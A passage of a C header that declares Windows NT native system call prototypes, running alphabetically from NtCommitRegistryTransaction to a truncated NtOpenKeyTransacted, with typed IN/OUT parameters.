EXTERN_C NTSTATUS NtCommitRegistryTransaction(
IN HANDLE RegistryHandle,
IN BOOL Wait);
EXTERN_C NTSTATUS NtCommitTransaction(
IN HANDLE TransactionHandle,
IN BOOLEAN Wait);
EXTERN_C NTSTATUS NtCompactKeys(
IN ULONG Count,
IN HANDLE KeyArray);
EXTERN_C NTSTATUS NtCompareObjects(
IN HANDLE FirstObjectHandle,
IN HANDLE SecondObjectHandle);
EXTERN_C NTSTATUS NtCompareSigningLevels(
IN ULONG UnknownParameter1,
IN ULONG UnknownParameter2);
EXTERN_C NTSTATUS NtCompareTokens(
IN HANDLE FirstTokenHandle,
IN HANDLE SecondTokenHandle,
OUT PBOOLEAN Equal);
EXTERN_C NTSTATUS NtCompleteConnectPort(
IN HANDLE PortHandle);
EXTERN_C NTSTATUS NtCompressKey(
IN HANDLE Key);
EXTERN_C NTSTATUS NtConnectPort(
OUT PHANDLE PortHandle,
IN PUNICODE_STRING PortName,
IN PSECURITY_QUALITY_OF_SERVICE SecurityQos,
IN OUT PPORT_SECTION_WRITE ClientView OPTIONAL,
IN OUT PPORT_SECTION_READ ServerView OPTIONAL,
OUT PULONG MaxMessageLength OPTIONAL,
IN OUT PVOID ConnectionInformation OPTIONAL,
IN OUT PULONG ConnectionInformationLength OPTIONAL);
EXTERN_C NTSTATUS NtConvertBetweenAuxiliaryCounterAndPerformanceCounter(
IN ULONG UnknownParameter1,
IN ULONG UnknownParameter2,
IN ULONG UnknownParameter3,
IN ULONG UnknownParameter4);
EXTERN_C NTSTATUS NtCreateDebugObject(
OUT PHANDLE DebugObjectHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG Flags);
EXTERN_C NTSTATUS NtCreateDirectoryObject(
OUT PHANDLE DirectoryHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtCreateDirectoryObjectEx(
OUT PHANDLE DirectoryHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN HANDLE ShadowDirectoryHandle,
IN ULONG Flags);
EXTERN_C NTSTATUS NtCreateEnclave(
IN HANDLE ProcessHandle,
IN OUT PVOID BaseAddress,
IN ULONG_PTR ZeroBits,
IN SIZE_T Size,
IN SIZE_T InitialCommitment,
IN ULONG EnclaveType,
IN PVOID EnclaveInformation,
IN ULONG EnclaveInformationLength,
OUT PULONG EnclaveError OPTIONAL);
EXTERN_C NTSTATUS NtCreateEnlistment(
OUT PHANDLE EnlistmentHandle,
IN ACCESS_MASK DesiredAccess,
IN HANDLE ResourceManagerHandle,
IN HANDLE TransactionHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN ULONG CreateOptions OPTIONAL,
IN NOTIFICATION_MASK NotificationMask,
IN PVOID EnlistmentKey OPTIONAL);
EXTERN_C NTSTATUS NtCreateEventPair(
OUT PHANDLE EventPairHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);
EXTERN_C NTSTATUS NtCreateIRTimer(
OUT PHANDLE TimerHandle,
IN ACCESS_MASK DesiredAccess);
EXTERN_C NTSTATUS NtCreateIoCompletion(
OUT PHANDLE IoCompletionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN ULONG Count OPTIONAL);
EXTERN_C NTSTATUS NtCreateJobObject(
OUT PHANDLE JobHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);
EXTERN_C NTSTATUS NtCreateJobSet(
IN ULONG NumJob,
IN PJOB_SET_ARRAY UserJobSet,
IN ULONG Flags);
EXTERN_C NTSTATUS NtCreateKeyTransacted(
OUT PHANDLE KeyHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG TitleIndex,
IN PUNICODE_STRING Class OPTIONAL,
IN ULONG CreateOptions,
IN HANDLE TransactionHandle,
OUT PULONG Disposition OPTIONAL);
EXTERN_C NTSTATUS NtCreateKeyedEvent(
OUT PHANDLE KeyedEventHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN ULONG Flags);
EXTERN_C NTSTATUS NtCreateLowBoxToken(
OUT PHANDLE TokenHandle,
IN HANDLE ExistingTokenHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PSID PackageSid,
IN ULONG CapabilityCount,
IN PSID_AND_ATTRIBUTES Capabilities OPTIONAL,
IN ULONG HandleCount,
IN HANDLE Handles OPTIONAL);
EXTERN_C NTSTATUS NtCreateMailslotFile(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG CreateOptions,
IN ULONG MailslotQuota,
IN ULONG MaximumMessageSize,
IN PLARGE_INTEGER ReadTimeout);
EXTERN_C NTSTATUS NtCreateMutant(
OUT PHANDLE MutantHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN BOOLEAN InitialOwner);
EXTERN_C NTSTATUS NtCreateNamedPipeFile(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN BOOLEAN NamedPipeType,
IN BOOLEAN ReadMode,
IN BOOLEAN CompletionMode,
IN ULONG MaximumInstances,
IN ULONG InboundQuota,
IN ULONG OutboundQuota,
IN PLARGE_INTEGER DefaultTimeout OPTIONAL);
EXTERN_C NTSTATUS NtCreatePagingFile(
IN PUNICODE_STRING PageFileName,
IN PULARGE_INTEGER MinimumSize,
IN PULARGE_INTEGER MaximumSize,
IN ULONG Priority);
EXTERN_C NTSTATUS NtCreatePartition(
OUT PHANDLE PartitionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN ULONG PreferredNode);
EXTERN_C NTSTATUS NtCreatePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN ULONG MaxConnectionInfoLength,
IN ULONG MaxMessageLength,
IN ULONG MaxPoolUsage OPTIONAL);
EXTERN_C NTSTATUS NtCreatePrivateNamespace(
OUT PHANDLE NamespaceHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PVOID BoundaryDescriptor);
EXTERN_C NTSTATUS NtCreateProcess(
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ParentProcess,
IN BOOLEAN InheritObjectTable,
IN HANDLE SectionHandle OPTIONAL,
IN HANDLE DebugPort OPTIONAL,
IN HANDLE ExceptionPort OPTIONAL);
EXTERN_C NTSTATUS NtCreateProfile(
OUT PHANDLE ProfileHandle,
IN HANDLE Process OPTIONAL,
IN PVOID ProfileBase,
IN ULONG ProfileSize,
IN ULONG BucketSize,
IN PULONG Buffer,
IN ULONG BufferSize,
IN KPROFILE_SOURCE ProfileSource,
IN ULONG Affinity);
EXTERN_C NTSTATUS NtCreateProfileEx(
OUT PHANDLE ProfileHandle,
IN HANDLE Process OPTIONAL,
IN PVOID ProfileBase,
IN SIZE_T ProfileSize,
IN ULONG BucketSize,
IN PULONG Buffer,
IN ULONG BufferSize,
IN KPROFILE_SOURCE ProfileSource,
IN USHORT GroupCount,
IN PGROUP_AFFINITY GroupAffinity);
EXTERN_C NTSTATUS NtCreateRegistryTransaction(
OUT PHANDLE Handle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN DWORD Flags);
EXTERN_C NTSTATUS NtCreateResourceManager(
OUT PHANDLE ResourceManagerHandle,
IN ACCESS_MASK DesiredAccess,
IN HANDLE TmHandle,
IN LPGUID RmGuid,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN ULONG CreateOptions OPTIONAL,
IN PUNICODE_STRING Description OPTIONAL);
EXTERN_C NTSTATUS NtCreateSemaphore(
OUT PHANDLE SemaphoreHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN LONG InitialCount,
IN LONG MaximumCount);
EXTERN_C NTSTATUS NtCreateSymbolicLinkObject(
OUT PHANDLE LinkHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PUNICODE_STRING LinkTarget);
EXTERN_C NTSTATUS NtCreateThreadEx(
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ProcessHandle,
IN PVOID StartRoutine,
IN PVOID Argument OPTIONAL,
IN ULONG CreateFlags,
IN SIZE_T ZeroBits,
IN SIZE_T StackSize,
IN SIZE_T MaximumStackSize,
IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);
EXTERN_C NTSTATUS NtCreateTimer(
OUT PHANDLE TimerHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN TIMER_TYPE TimerType);
EXTERN_C NTSTATUS NtCreateTimer2(
OUT PHANDLE TimerHandle,
IN PVOID Reserved1 OPTIONAL,
IN PVOID Reserved2 OPTIONAL,
IN ULONG Attributes,
IN ACCESS_MASK DesiredAccess);
EXTERN_C NTSTATUS NtCreateToken(
OUT PHANDLE TokenHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN TOKEN_TYPE TokenType,
IN PLUID AuthenticationId,
IN PLARGE_INTEGER ExpirationTime,
IN PTOKEN_USER User,
IN PTOKEN_GROUPS Groups,
IN PTOKEN_PRIVILEGES Privileges,
IN PTOKEN_OWNER Owner OPTIONAL,
IN PTOKEN_PRIMARY_GROUP PrimaryGroup,
IN PTOKEN_DEFAULT_DACL DefaultDacl OPTIONAL,
IN PTOKEN_SOURCE TokenSource);
EXTERN_C NTSTATUS NtCreateTokenEx(
OUT PHANDLE TokenHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN TOKEN_TYPE TokenType,
IN PLUID AuthenticationId,
IN PLARGE_INTEGER ExpirationTime,
IN PTOKEN_USER User,
IN PTOKEN_GROUPS Groups,
IN PTOKEN_PRIVILEGES Privileges,
IN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION UserAttributes OPTIONAL,
IN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION DeviceAttributes OPTIONAL,
IN PTOKEN_GROUPS DeviceGroups OPTIONAL,
IN PTOKEN_MANDATORY_POLICY TokenMandatoryPolicy OPTIONAL,
IN PTOKEN_OWNER Owner OPTIONAL,
IN PTOKEN_PRIMARY_GROUP PrimaryGroup,
IN PTOKEN_DEFAULT_DACL DefaultDacl OPTIONAL,
IN PTOKEN_SOURCE TokenSource);
EXTERN_C NTSTATUS NtCreateTransaction(
OUT PHANDLE TransactionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN LPGUID Uow OPTIONAL,
IN HANDLE TmHandle OPTIONAL,
IN ULONG CreateOptions OPTIONAL,
IN ULONG IsolationLevel OPTIONAL,
IN ULONG IsolationFlags OPTIONAL,
IN PLARGE_INTEGER Timeout OPTIONAL,
IN PUNICODE_STRING Description OPTIONAL);
EXTERN_C NTSTATUS NtCreateTransactionManager(
OUT PHANDLE TmHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PUNICODE_STRING LogFileName OPTIONAL,
IN ULONG CreateOptions OPTIONAL,
IN ULONG CommitStrength OPTIONAL);
EXTERN_C NTSTATUS NtCreateUserProcess(
OUT PHANDLE ProcessHandle,
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK ProcessDesiredAccess,
IN ACCESS_MASK ThreadDesiredAccess,
IN POBJECT_ATTRIBUTES ProcessObjectAttributes OPTIONAL,
IN POBJECT_ATTRIBUTES ThreadObjectAttributes OPTIONAL,
IN ULONG ProcessFlags,
IN ULONG ThreadFlags,
IN PVOID ProcessParameters OPTIONAL,
IN OUT PPS_CREATE_INFO CreateInfo,
IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);
EXTERN_C NTSTATUS NtCreateWaitCompletionPacket(
OUT PHANDLE WaitCompletionPacketHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);
EXTERN_C NTSTATUS NtCreateWaitablePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN ULONG MaxConnectionInfoLength,
IN ULONG MaxMessageLength,
IN ULONG MaxPoolUsage OPTIONAL);
EXTERN_C NTSTATUS NtCreateWnfStateName(
OUT PCWNF_STATE_NAME StateName,
IN WNF_STATE_NAME_LIFETIME NameLifetime,
IN WNF_DATA_SCOPE DataScope,
IN BOOLEAN PersistData,
IN PCWNF_TYPE_ID TypeId OPTIONAL,
IN ULONG MaximumStateSize,
IN PSECURITY_DESCRIPTOR SecurityDescriptor);
EXTERN_C NTSTATUS NtCreateWorkerFactory(
OUT PHANDLE WorkerFactoryHandleReturn,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE CompletionPortHandle,
IN HANDLE WorkerProcessHandle,
IN PVOID StartRoutine,
IN PVOID StartParameter OPTIONAL,
IN ULONG MaxThreadCount OPTIONAL,
IN SIZE_T StackReserve OPTIONAL,
IN SIZE_T StackCommit OPTIONAL);
EXTERN_C NTSTATUS NtDebugActiveProcess(
IN HANDLE ProcessHandle,
IN HANDLE DebugObjectHandle);
EXTERN_C NTSTATUS NtDebugContinue(
IN HANDLE DebugObjectHandle,
IN PCLIENT_ID ClientId,
IN NTSTATUS ContinueStatus);
EXTERN_C NTSTATUS NtDeleteAtom(
IN USHORT Atom);
EXTERN_C NTSTATUS NtDeleteBootEntry(
IN ULONG Id);
EXTERN_C NTSTATUS NtDeleteDriverEntry(
IN ULONG Id);
EXTERN_C NTSTATUS NtDeleteFile(
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtDeleteKey(
IN HANDLE KeyHandle);
EXTERN_C NTSTATUS NtDeleteObjectAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN BOOLEAN GenerateOnClose);
EXTERN_C NTSTATUS NtDeletePrivateNamespace(
IN HANDLE NamespaceHandle);
EXTERN_C NTSTATUS NtDeleteValueKey(
IN HANDLE KeyHandle,
IN PUNICODE_STRING ValueName);
EXTERN_C NTSTATUS NtDeleteWnfStateData(
IN PCWNF_STATE_NAME StateName,
IN PVOID ExplicitScope OPTIONAL);
EXTERN_C NTSTATUS NtDeleteWnfStateName(
IN PCWNF_STATE_NAME StateName);
EXTERN_C NTSTATUS NtDisableLastKnownGood();
EXTERN_C NTSTATUS NtDisplayString(
IN PUNICODE_STRING String);
EXTERN_C NTSTATUS NtDrawText(
IN PUNICODE_STRING String);
EXTERN_C NTSTATUS NtEnableLastKnownGood();
EXTERN_C NTSTATUS NtEnumerateBootEntries(
OUT PVOID Buffer OPTIONAL,
IN OUT PULONG BufferLength);
EXTERN_C NTSTATUS NtEnumerateDriverEntries(
OUT PVOID Buffer OPTIONAL,
IN OUT PULONG BufferLength);
EXTERN_C NTSTATUS NtEnumerateSystemEnvironmentValuesEx(
IN ULONG InformationClass,
OUT PVOID Buffer,
IN OUT PULONG BufferLength);
EXTERN_C NTSTATUS NtEnumerateTransactionObject(
IN HANDLE RootObjectHandle OPTIONAL,
IN KTMOBJECT_TYPE QueryType,
IN OUT PKTMOBJECT_CURSOR ObjectCursor,
IN ULONG ObjectCursorLength,
OUT PULONG ReturnLength);
EXTERN_C NTSTATUS NtExtendSection(
IN HANDLE SectionHandle,
IN OUT PLARGE_INTEGER NewSectionSize);
EXTERN_C NTSTATUS NtFilterBootOption(
IN FILTER_BOOT_OPTION_OPERATION FilterOperation,
IN ULONG ObjectType,
IN ULONG ElementType,
IN PVOID SystemData OPTIONAL,
IN ULONG DataSize);
EXTERN_C NTSTATUS NtFilterToken(
IN HANDLE ExistingTokenHandle,
IN ULONG Flags,
IN PTOKEN_GROUPS SidsToDisable OPTIONAL,
IN PTOKEN_PRIVILEGES PrivilegesToDelete OPTIONAL,
IN PTOKEN_GROUPS RestrictedSids OPTIONAL,
OUT PHANDLE NewTokenHandle);
EXTERN_C NTSTATUS NtFilterTokenEx(
IN HANDLE TokenHandle,
IN ULONG Flags,
IN PTOKEN_GROUPS SidsToDisable OPTIONAL,
IN PTOKEN_PRIVILEGES PrivilegesToDelete OPTIONAL,
IN PTOKEN_GROUPS RestrictedSids OPTIONAL,
IN ULONG DisableUserClaimsCount,
IN PUNICODE_STRING UserClaimsToDisable OPTIONAL,
IN ULONG DisableDeviceClaimsCount,
IN PUNICODE_STRING DeviceClaimsToDisable OPTIONAL,
IN PTOKEN_GROUPS DeviceGroupsToDisable OPTIONAL,
IN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION RestrictedUserAttributes OPTIONAL,
IN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION RestrictedDeviceAttributes OPTIONAL,
IN PTOKEN_GROUPS RestrictedDeviceGroups OPTIONAL,
OUT PHANDLE NewTokenHandle);
EXTERN_C NTSTATUS NtFlushBuffersFileEx(
IN HANDLE FileHandle,
IN ULONG Flags,
IN PVOID Parameters,
IN ULONG ParametersSize,
OUT PIO_STATUS_BLOCK IoStatusBlock);
EXTERN_C NTSTATUS NtFlushInstallUILanguage(
IN LANGID InstallUILanguage,
IN ULONG SetComittedFlag);
EXTERN_C NTSTATUS NtFlushInstructionCache(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress OPTIONAL,
IN ULONG Length);
EXTERN_C NTSTATUS NtFlushKey(
IN HANDLE KeyHandle);
EXTERN_C NTSTATUS NtFlushProcessWriteBuffers();
EXTERN_C NTSTATUS NtFlushVirtualMemory(
IN HANDLE ProcessHandle,
IN OUT PVOID BaseAddress,
IN OUT PULONG RegionSize,
OUT PIO_STATUS_BLOCK IoStatusBlock);
EXTERN_C NTSTATUS NtFlushWriteBuffer();
EXTERN_C NTSTATUS NtFreeUserPhysicalPages(
IN HANDLE ProcessHandle,
IN OUT PULONG NumberOfPages,
IN PULONG UserPfnArray);
EXTERN_C NTSTATUS NtFreezeRegistry(
IN ULONG TimeOutInSeconds);
EXTERN_C NTSTATUS NtFreezeTransactions(
IN PLARGE_INTEGER FreezeTimeout,
IN PLARGE_INTEGER ThawTimeout);
EXTERN_C NTSTATUS NtGetCachedSigningLevel(
IN HANDLE File,
OUT PULONG Flags,
OUT PSE_SIGNING_LEVEL SigningLevel,
OUT PUCHAR Thumbprint OPTIONAL,
IN OUT PULONG ThumbprintSize OPTIONAL,
OUT PULONG ThumbprintAlgorithm OPTIONAL);
EXTERN_C NTSTATUS NtGetCompleteWnfStateSubscription(
IN PCWNF_STATE_NAME OldDescriptorStateName OPTIONAL,
IN PLARGE_INTEGER OldSubscriptionId OPTIONAL,
IN ULONG OldDescriptorEventMask OPTIONAL,
IN ULONG OldDescriptorStatus OPTIONAL,
OUT PWNF_DELIVERY_DESCRIPTOR NewDeliveryDescriptor,
IN ULONG DescriptorSize);
EXTERN_C NTSTATUS NtGetContextThread(
IN HANDLE ThreadHandle,
IN OUT PCONTEXT ThreadContext);
EXTERN_C NTSTATUS NtGetCurrentProcessorNumber();
EXTERN_C NTSTATUS NtGetCurrentProcessorNumberEx(
OUT PULONG ProcNumber OPTIONAL);
EXTERN_C NTSTATUS NtGetDevicePowerState(
IN HANDLE Device,
OUT PDEVICE_POWER_STATE State);
EXTERN_C NTSTATUS NtGetMUIRegistryInfo(
IN ULONG Flags,
IN OUT PULONG DataSize,
OUT PVOID SystemData);
EXTERN_C NTSTATUS NtGetNextProcess(
IN HANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN ULONG HandleAttributes,
IN ULONG Flags,
OUT PHANDLE NewProcessHandle);
EXTERN_C NTSTATUS NtGetNextThread(
IN HANDLE ProcessHandle,
IN HANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN ULONG HandleAttributes,
IN ULONG Flags,
OUT PHANDLE NewThreadHandle);
EXTERN_C NTSTATUS NtGetNlsSectionPtr(
IN ULONG SectionType,
IN ULONG SectionData,
IN PVOID ContextData,
OUT PVOID SectionPointer,
OUT PULONG SectionSize);
EXTERN_C NTSTATUS NtGetNotificationResourceManager(
IN HANDLE ResourceManagerHandle,
OUT PTRANSACTION_NOTIFICATION TransactionNotification,
IN ULONG NotificationLength,
IN PLARGE_INTEGER Timeout OPTIONAL,
OUT PULONG ReturnLength OPTIONAL,
IN ULONG Asynchronous,
IN ULONG AsynchronousContext OPTIONAL);
EXTERN_C NTSTATUS NtGetWriteWatch(
IN HANDLE ProcessHandle,
IN ULONG Flags,
IN PVOID BaseAddress,
IN ULONG RegionSize,
OUT PULONG UserAddressArray,
IN OUT PULONG EntriesInUserAddressArray,
OUT PULONG Granularity);
EXTERN_C NTSTATUS NtImpersonateAnonymousToken(
IN HANDLE ThreadHandle);
EXTERN_C NTSTATUS NtImpersonateThread(
IN HANDLE ServerThreadHandle,
IN HANDLE ClientThreadHandle,
IN PSECURITY_QUALITY_OF_SERVICE SecurityQos);
EXTERN_C NTSTATUS NtInitializeEnclave(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
IN PVOID EnclaveInformation,
IN ULONG EnclaveInformationLength,
OUT PULONG EnclaveError OPTIONAL);
EXTERN_C NTSTATUS NtInitializeNlsFiles(
OUT PVOID BaseAddress,
OUT PLCID DefaultLocaleId,
OUT PLARGE_INTEGER DefaultCasingTableSize);
EXTERN_C NTSTATUS NtInitializeRegistry(
IN USHORT BootCondition);
EXTERN_C NTSTATUS NtInitiatePowerAction(
IN POWER_ACTION SystemAction,
IN SYSTEM_POWER_STATE LightestSystemState,
IN ULONG Flags,
IN BOOLEAN Asynchronous);
EXTERN_C NTSTATUS NtIsSystemResumeAutomatic();
EXTERN_C NTSTATUS NtIsUILanguageComitted();
EXTERN_C NTSTATUS NtListenPort(
IN HANDLE PortHandle,
OUT PPORT_MESSAGE ConnectionRequest);
EXTERN_C NTSTATUS NtLoadDriver(
IN PUNICODE_STRING DriverServiceName);
EXTERN_C NTSTATUS NtLoadEnclaveData(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
IN PVOID Buffer,
IN SIZE_T BufferSize,
IN ULONG Protect,
IN PVOID PageInformation,
IN ULONG PageInformationLength,
OUT PSIZE_T NumberOfBytesWritten OPTIONAL,
OUT PULONG EnclaveError OPTIONAL);
EXTERN_C NTSTATUS NtLoadHotPatch(
IN PUNICODE_STRING HotPatchName,
IN ULONG LoadFlag);
EXTERN_C NTSTATUS NtLoadKey(
IN POBJECT_ATTRIBUTES TargetKey,
IN POBJECT_ATTRIBUTES SourceFile);
EXTERN_C NTSTATUS NtLoadKey2(
IN POBJECT_ATTRIBUTES TargetKey,
IN POBJECT_ATTRIBUTES SourceFile,
IN ULONG Flags);
EXTERN_C NTSTATUS NtLoadKeyEx(
IN POBJECT_ATTRIBUTES TargetKey,
IN POBJECT_ATTRIBUTES SourceFile,
IN ULONG Flags,
IN HANDLE TrustClassKey OPTIONAL,
IN HANDLE Event OPTIONAL,
IN ACCESS_MASK DesiredAccess OPTIONAL,
OUT PHANDLE RootHandle OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatus OPTIONAL);
EXTERN_C NTSTATUS NtLockFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PULARGE_INTEGER ByteOffset,
IN PULARGE_INTEGER Length,
IN ULONG Key,
IN BOOLEAN FailImmediately,
IN BOOLEAN ExclusiveLock);
EXTERN_C NTSTATUS NtLockProductActivationKeys(
IN OUT PULONG pPrivateVer OPTIONAL,
OUT PULONG pSafeMode OPTIONAL);
EXTERN_C NTSTATUS NtLockRegistryKey(
IN HANDLE KeyHandle);
EXTERN_C NTSTATUS NtLockVirtualMemory(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
IN PULONG RegionSize,
IN ULONG MapType);
EXTERN_C NTSTATUS NtMakePermanentObject(
IN HANDLE Handle);
EXTERN_C NTSTATUS NtMakeTemporaryObject(
IN HANDLE Handle);
EXTERN_C NTSTATUS NtManagePartition(
IN HANDLE TargetHandle,
IN HANDLE SourceHandle,
IN MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass,
IN OUT PVOID PartitionInformation,
IN ULONG PartitionInformationLength);
EXTERN_C NTSTATUS NtMapCMFModule(
IN ULONG What,
IN ULONG Index,
OUT PULONG CacheIndexOut OPTIONAL,
OUT PULONG CacheFlagsOut OPTIONAL,
OUT PULONG ViewSizeOut OPTIONAL,
OUT PVOID BaseAddress OPTIONAL);
EXTERN_C NTSTATUS NtMapUserPhysicalPages(
IN PVOID VirtualAddress,
IN PULONG NumberOfPages,
IN PULONG UserPfnArray OPTIONAL);
EXTERN_C NTSTATUS NtMapViewOfSectionEx(
IN HANDLE SectionHandle,
IN HANDLE ProcessHandle,
IN OUT PLARGE_INTEGER SectionOffset,
IN OUT PPVOID BaseAddress,
IN OUT PSIZE_T ViewSize,
IN ULONG AllocationType,
IN ULONG Protect,
IN OUT PVOID DataBuffer OPTIONAL,
IN ULONG DataCount);
EXTERN_C NTSTATUS NtModifyBootEntry(
IN PBOOT_ENTRY BootEntry);
EXTERN_C NTSTATUS NtModifyDriverEntry(
IN PEFI_DRIVER_ENTRY DriverEntry);
EXTERN_C NTSTATUS NtNotifyChangeDirectoryFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PFILE_NOTIFY_INFORMATION Buffer,
IN ULONG Length,
IN ULONG CompletionFilter,
IN BOOLEAN WatchTree);
EXTERN_C NTSTATUS NtNotifyChangeDirectoryFileEx(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID Buffer,
IN ULONG Length,
IN ULONG CompletionFilter,
IN BOOLEAN WatchTree,
IN DIRECTORY_NOTIFY_INFORMATION_CLASS DirectoryNotifyInformationClass OPTIONAL);
EXTERN_C NTSTATUS NtNotifyChangeKey(
IN HANDLE KeyHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG CompletionFilter,
IN BOOLEAN WatchTree,
OUT PVOID Buffer OPTIONAL,
IN ULONG BufferSize,
IN BOOLEAN Asynchronous);
EXTERN_C NTSTATUS NtNotifyChangeMultipleKeys(
IN HANDLE MasterKeyHandle,
IN ULONG Count OPTIONAL,
IN POBJECT_ATTRIBUTES SubordinateObjects OPTIONAL,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG CompletionFilter,
IN BOOLEAN WatchTree,
OUT PVOID Buffer OPTIONAL,
IN ULONG BufferSize,
IN BOOLEAN Asynchronous);
EXTERN_C NTSTATUS NtNotifyChangeSession(
IN HANDLE SessionHandle,
IN ULONG ChangeSequenceNumber,
IN PLARGE_INTEGER ChangeTimeStamp,
IN IO_SESSION_EVENT Event,
IN IO_SESSION_STATE NewState,
IN IO_SESSION_STATE PreviousState,
IN PVOID Payload OPTIONAL,
IN ULONG PayloadSize);
EXTERN_C NTSTATUS NtOpenEnlistment(
OUT PHANDLE EnlistmentHandle,
IN ACCESS_MASK DesiredAccess,
IN HANDLE ResourceManagerHandle,
IN LPGUID EnlistmentGuid,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);
EXTERN_C NTSTATUS NtOpenEventPair(
OUT PHANDLE EventPairHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenIoCompletion(
OUT PHANDLE IoCompletionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenJobObject(
OUT PHANDLE JobHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenKeyEx(
OUT PHANDLE KeyHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG OpenOptions);
EXTERN_C NTSTATUS NtOpenKeyTransacted(
